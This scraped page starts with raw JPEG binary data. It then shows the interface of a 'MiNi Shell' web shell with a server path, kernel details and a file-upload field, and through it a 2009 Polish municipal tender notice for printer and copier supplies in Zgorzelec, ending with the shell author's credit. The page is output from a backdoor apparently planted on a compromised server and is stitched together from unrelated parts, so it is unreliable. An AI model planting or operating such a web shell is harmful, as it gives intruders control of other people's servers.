JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090213/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090213/37761-N-2009.html

<p class="kh_header"><b>Zgorzelec: Dostawa materiałów eksploatacyjnych do drukarek i kserokopiarek na potrzeby Urzędu Miasta Zgorzelec</b><br>
<b>Numer ogłoszenia: 37761 - 2009; data zamieszczenia: 13.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Zgorzelec , ul. Domańskiego 7, 59-900 Zgorzelec, woj. dolnośląskie, tel. 0-75 77 56 988, faks 075 77 56 988.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.um-zgorzelec.dolnyslask.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa materiałów eksploatacyjnych do drukarek i kserokopiarek na potrzeby Urzędu Miasta Zgorzelec.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest dostawa materiałów eksploatacyjnych do drukarek                   i kserokopiarek na potrzeby Urzędu Miasta Zgorzelec.

2.	Realizacja przedmiotu zamówienia nastąpi w dwóch dostawach, w następujących terminach:

a.	pierwsza dostawa do 31.03.2009 r.

b.	druga dostawa do 30.09.2009 r.
           
3.	Realizacja przedmiotu zamówienia nastąpi z uwzględnieniem niniejszych postanowień:
            
3.1	Materiały eksploatacyjne muszą być opakowane w fabrycznie oznakowanych opakowaniach, umożliwiających identyfikację, z oznaczeniem producenta, wraz                z symbolem artykułu eksploatacyjnego, kartonowe opakowania zewnętrzne zawierające kilka sztuk - z logo i nazwą producenta, opisem zawartości i oznaczone numerem katalogowym produktu (symbolem); pojedyncze pakowane hermetycznie, uniemożliwiając kontakt produktu z atmosferą.

      3.2 Dostarczone przez Wykonawcę materiały eksploatacyjne muszą być wyprodukowane nie    wcześniej niż 6 miesięcy przed dostawą do Zamawiającego.

      3.3 Wymogi jakościowe dotyczące zamawianych materiałów eksploatacyjnych:

1.	Oferowane materiały muszą być fabrycznie nowe i oryginalne.

2.	Zamawiający dopuszcza możliwość zaoferowania materiałów  eksploatacyjnych równoważnych.

3.	Pod pojęciem fabrycznie nowe Zamawiający rozumie - artykuły bez śladów używania i uszkodzenia, wolne od wad technicznych i prawnych, dopuszczone do obrotu, gatunku I-go, pełnowartościowe, nieregenerowane, nierepredukowane i nierefabrykowane, do których produkcji zostały wykorzystane wyłącznie elementy/półfabrykaty w 100% nowe, bez śladów poprzedniego używania                    i uszkodzenia, nie wchodzące wcześniej (pierwotnie) w części ani w całości                   w skład innych artykułów.


4.	Pod pojęciem oryginalne Zamawiający rozumie - artykuły eksploatacyjne wyprodukowane przez producenta urządzenia, dla którego są dedykowane                 i opatrzone jego zastrzeżonym znakiem towarowym, nie będące naśladownictwem lub przeróbką i nie fałszowane.

5.	Pod pojęciem równoważne Zamawiający rozumie artykuły fabrycznie nowe, czyli przy ich produkcji musi być wykorzystane 100% nowych części, w pełni kompatybilne ze sprzętem, do którego są zamówione, których jakość, parametry techniczne, w tym wydajność, jest co najmniej taka, jak materiałów oryginalnych. Żadna z części np. kaseta, bęben światłoczuły, obudowa, listwa podająca, listwa zbierająca, wałek magnetyczny, głowica drukująca, toner, atrament, tusz oraz pozostałe części, nie były wykorzystywane w formie pierwotnej w całości lub w części w innym produkcie. Materiały nie mogą mieć śladów poprzedniego używania i uszkodzenia, nie mogą być regenerowane, reprodukowane czy też prefabrykowane, muszą pochodzić z bieżącej produkcji, a ich zastosowanie nie może spowodować uszkodzenia sprzętu lub pogorszenia jakości jego pracy lub jakości wydruku.
       Za materiały równoważne Zamawiający uzna tylko takie produkty, które:

a.	nie powodują uszkodzeń sprzętu lub pogorszenia jakości jego pracy bądź jakości wydruku,

b.	są wytwarzane w systemie zarządzania jakością ISO 9001                                   (lub równoważnymi) - co winno być potwierdzone dołączonymi do oferty stosownymi dokumentami,

c.	są wytwarzane przy zastosowaniu technologii opartej na normie ISO 1400             ( lub równoważnymi),

d.	ich wydajność jest nie mniejsza (co oznacza, iż co najmniej równa lub większa), niż materiałów eksploatacyjnych oryginalnych, produkowanych przez producenta sprzętu (podanych na opakowaniach produktu lub na stronie internetowej producenta),

e.	wydajność równoważnych tuszy i tonerów została przebadana zgodnie                      z normami do mierzenia wydajności tuszy i tonerów zatwierdzonymi  przez Organizację ISO (International Organization for Standardization), które pozwalają porównać tusze i tonery różnych firm w stosunku do produktów oryginalnych, a mianowicie normą:
- ISO/IEC 19752 - stosowaną do określania wydajności kaset z tonerem do monochromatycznych drukarek laserowych,
- ISO/IEC 24712  i ISO/IEC 24711 - stosowane do określania wydajności wkładów do drukarek atramentowych,
- ISO/IEC 19798 - stosowana do określania wydajności kaset z tonerem  do kolorowych drukarek laserowych.

f.	Wykonawca zobowiązany jest do potwierdzenia wydajności zaoferowanych tuszy i tonerów równoważnych poprzez dołączenie  do oferty certyfikatów, zaświadczeń, bądź kserokopii protokołu z wynikami testów wydajnościowych - przeprowadzonych według standardu jednej z w/w norm ISO/IEC - na każdą pozycję oferowanego równoważnego tuszu lub tonera,

g.	Wykonawca składający ofertę na artykuły równoważne zobowiązany jest przedstawić wykaz materiałów równoważnych z podaniem nazwy ich producenta, numerem katalogowym (symbolem) oraz podanie ich wydajności - poprzez wypełnienie odpowiednich rubryk w formularzu cenowym lub sporządzając oddzielny dokument z zachowaniem wzoru Zamawiającego.

6.	Zastosowanie materiałów równoważnych nie może naruszać warunków        Wykonawca przyjmuje na siebie pełną odpowiedzialność za uszkodzenia sprzętu spowodowane używaniem zaoferowanych materiałów. Ewentualne naprawy sprzętu wynikłe z winy dostarczonych materiałów  eksploatacyjnych pokryje Wykonawca na podstawie  refaktury i opinii autoryzowanego serwisu producenta sprzętu stwierdzającej, że naprawa wynikła z winy tonera lub wkładu drukującego.

7.	Jeżeli w trakcie trwania umowy Zamawiający stwierdzi, iż wydajność, jakość lub niezawodność dostarczonych  produktów równoważnych niekorzystnie odbiega od parametrów produktu oryginalnego (pochodzącego od producenta urządzenia, do którego materiał jest przeznaczony), Wykonawca na żądanie Zamawiającego winien materiał oferowany w asortymencie, którego żądanie dotyczy, wymienić na materiał spełniający wymagania Zamawiającego bez zmiany ceny.        

4 Szczegółowy opis przedmiotu zamówienia stanowi Załącznik nr 1 do SIWZ..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 30.12.51.10-5, 30.12.51.00-2, 30.19.21.13-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.	Wykonawca wniesie wadium w wysokości 1.800,00 zł przed upływem terminu  składania ofert, który został określony w pkt. 16.1 SIWZ.

2.	W zależności od woli wykonawcy wadium może być wnoszone w formach:

a.	pieniądzu (przelew na rachunek bankowy wskazany przez zamawiającego),
b.	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym
c.	gwarancjach bankowych,
d.	gwarancjach ubezpieczeniowych,
e.	poręczeniach udzielanych przez podmioty, o których mowa w art.. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 z późn. zm.)

3.	Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy zamawiającego Nr 35124012971111000025654013 w banku PeKaO S.A. I O/Zgorzelec.

Potwierdzeniem tej formy wniesienia wadium będzie kopia przelewu (wpłaty)  
załączona do oferty z dopiskiem Wadium do postępowania nr WZP.341-11/09.
		
4.	Wykonawca, którego oferta nie będzie zabezpieczona akceptowalną formą wadium zostanie wykluczony z postępowania o udzielenie zamówienia, a jego oferta zostanie odrzucona zgodnie z art. 24 ust. 2 pkt 4 ustawy Prawo zamówień publicznych.

5.	Zamawiający zwróci niezwłocznie wadium, jeżeli:
1.	upłynął termin związania ofertą,

2.	zawarto umowę w sprawie zamówienia publicznego i wniesiono zabezpieczenie należytego wykonania tej umowy,

3.	Zamawiający unieważnił postępowanie o udzielenie zamówienia, a protesty zostały ostatecznie rozstrzygnięte lub upłynął termin do ich wnoszenia.

6.	Z zastrzeżeniem pkt. 6 a, Zamawiający zwróci niezwłocznie wadium na wniosek wykonawcy:
1.	który wycofał ofertę przed upływem terminu składania ofert,

2.	który został wykluczony z postępowania,

3.	którego oferta została odrzucona.

      6 a   Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.

7.	Jeżeli wadium wniesiono w pieniądzu, zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę.
8.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana:
1.	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,

2.	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,

3.	Zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.

4.	w przypadku określonym w pkt. 6 a specyfikacji istotnych warunków zamówienia.


9.	W przypadku wniesienia wadium w formach innych niż wymienione w pkt. 2 ppkt od b do e z treści dokumentu musi jednoznacznie wynikać, iż wypłata Zamawiającemu sumy gwarancyjnej nastąpi także w przypadku określonym w pkt.6 a.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie Zamówienia mogą  ubiegać się Wykonawcy spełniający warunki określone              w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych, czyli:

1 	Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
                
 Ocena spełnienia tego warunku odbędzie się na podstawie analizy treści:

a.	aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia                    o wpisie do ewidencji działalności  gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania  ofert,

b.	zaświadczenia z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt  4-8  ustawy Pzp, wystawione nie wcześniej niż  6 miesięcy przed terminem składania ofert,

c.	zaświadczenia z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust.1 pkt 9 ustawy Pzp, wystawione nie wcześniej niż 6 miesięcy przed terminem składania ofert,

Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt. 1 a i c składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio dla pkt. 1 a - że nie otwarto jego likwidacji ani nie ogłoszono upadłości, dla pkt. 1 c - nie orzeczono wobec niego zakazu ubiegania się o zamówienie wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
W zakresie dokumentu określonego w pkt. 1 b Wykonawca składa zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt. 1, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, wystawionym nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

2 	Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania lub przestawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia określonego  w niniejszym postępowaniu.  Zamawiający w tym zakresie żąda następującego dokumentu.:

a.	 wykazu dwóch wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych dostaw w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością dostaw stanowiącym przedmiot zamówienia tj. polegających na dostawie materiałów eksploatacyjnych do drukarek/kserokopiarek, z podaniem ich wartości brutto nie mniejszej niż 30.000 zł każda oraz daty i miejsca wykonania z załączeniem dokumentów potwierdzających, że usługi te zostały wykonane należycie - formularz Nr 3 do SIWZ.
                          
3   Nie podlegają wykluczeniu z postępowania o zamówienie publiczne zgodnie                            z art.24 ust.  1 i   2 ustawy Prawo zamówień publicznych.

4         Złożą oświadczenie o spełnianiu warunków udziału w postępowaniu o udzielenie  Zamówienia  /oświadczenie zostało określone formularzem Nr 2 do SIWZ/

Zamawiający dokona oceny spełnienia każdego z  warunków na podstawie załączonych do oferty dokumentów, o których mowa w pkt. 10  SIWZ  metodą spełnia /  nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Zamawiający wymaga złożenia dokumentów potwierdzających spełnianie warunków udziału  w postępowaniu, zgodnie z treścią rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane. W celu:

1	potwierdzenia, że wykonawca posiada uprawnienie do wykonywania określonej 
           działalności  lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy  z  dnia 29 stycznia 2004 r. - Prawo zamówień publicznych, zwanej dalej ustawą, zamawiający żąda  następujących dokumentów:

a.	Oryginału lub kopii aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,                  

b.	Zaświadczenia z Krajowego Rejestru Karnego w zakresie określonym w art.24 ust. 1  pkt. 4-8 ustawy Pzp, wystawionego nie wcześniej niż na 6 miesięcy przed terminem składania ofert, 

c.	Zaświadczenia z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy Pzp, wystawionego nie wcześniej niż na 6 miesięcy przed terminem składania ofert,

2	potwierdzenia, że wykonawca posiada niezbędną wiedzę i doświadczenie oraz dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia zamawiający  żąda następującego dokumentu:

a.	Wypełnionego formularza wykazu zrealizowanych /wykonywanych dostaw zgodnie  z zapisem w pkt. 9.2 a SIWZ - formularz Nr 3  do SIWZ,

3	 Oświadczenie Wykonawcy, że posiada niezbędny potencjał finansowy, kadrowy, techniczny oraz doświadczenie niezbędne do realizacji zamówienia oraz, że nie podlega 	wykluczeniu z postępowania na podstawie art. 24 ustawy Prawo zamówień publicznych złożone na druku stanowiącym formularz nr 2  do SIWZ . 

4    W celu potwierdzenia spełniania wymagań określonych przez Zamawiającego dla materiałów eksploatacyjnych - równoważnych, do oferty na podstawie art. 25 ust. 1 pkt. 2 ustawy Pzp, należy dołączyć (tylko w przypadku złożenia przez Wykonawcę oferty z materiałami równoważnymi):

a.	wykaz materiałów równoważnych z podaniem nazwy ich producenta, numerem katalogowym (symbolem) oraz podaniem ich wydajności: na podstawie norm ISO lub równoważnych (dotyczy tuszy i tonerów) lub podanie minimalnej wydajności przy standardowym zadruku na podstawie danych producenta (dotyczy pozostałych materiałów eksploatacyjnych) - poprzez wypełnienie odpowiednich rubryk w formularzu cenowym do oferty (załącznik nr 1 do SIWZ), 
b.	na potwierdzenie podanej przez Wykonawcę wydajności tuszy i tonerów równoważnych, należy dołączyć aktualny certyfikat, zaświadczenie, bądź kserokopię z wyników testów wydajnościowych przeprowadzonych według standardu norm ISO/IEC 19752 lub ISO/IEC 24712 lub ISO/IEC 24711, lub ISO/IEC 19798 lub innej normy równoważnej - na każdy tusz i toner równoważny przedstawiony w ofercie,
c.	zaświadczenie podmiotu uprawnionego do kontroli jakości (certyfikaty) potwierdzające, że proces produkcji zaoferowanych materiałów eksploatacyjnych równoważnych przebiega zgodnie z normą ISO 9001 lub równoważną przy zastosowaniu technologii opartej na normie ISO 14001 lub równoważnej, którymi powinien legitymować się producent proponowanych przez Wykonawcę materiałów eksploatacyjnych.

W przypadku złożenia oferty wspólnej, dokumenty o których mowa w pkt. 1 od a do c  składa każdy  z wykonawców. 

Wymagania dotyczące oferty

   Do oferty Wykonawca musi złożyć następujące dokumenty, pod rygorem odrzucenia  oferty  zgodnie z art. 89 ust. 1 pkt. 2 , z zastrzeżeniem art. 87 ust. 2 pkt. 3 ustawy PZP:

1)	wypełniony  formularz ofertowy - formularz Nr 1,

2)	wypełniony formularz cenowy - formularz Nr 1A,

3)	wypełniony formularz oświadczenia wskazującego część zamówienia, której wykonawca powierzy podwykonawcom - formularz nr  5  do SIWZ,

4)	informacje na temat wykonawcy (wg zał. wzoru ) - formularz nr 6 do SIWZ.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://www.bip.um-zgorzelec.dolnyslask.pl/.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta w Zgorzelcu
59-900 Zgorzelec, ul. Domańskiego 6,pokój nr 6.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.02.2009 godzina 10:00, miejsce: w siedzibie  Zamawiającego tj.:
Punkt Obsługi Interesanta
Urząd Miasta w Zgorzelcu
59-900 Zgorzelec
ul. Domańskiego 7.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com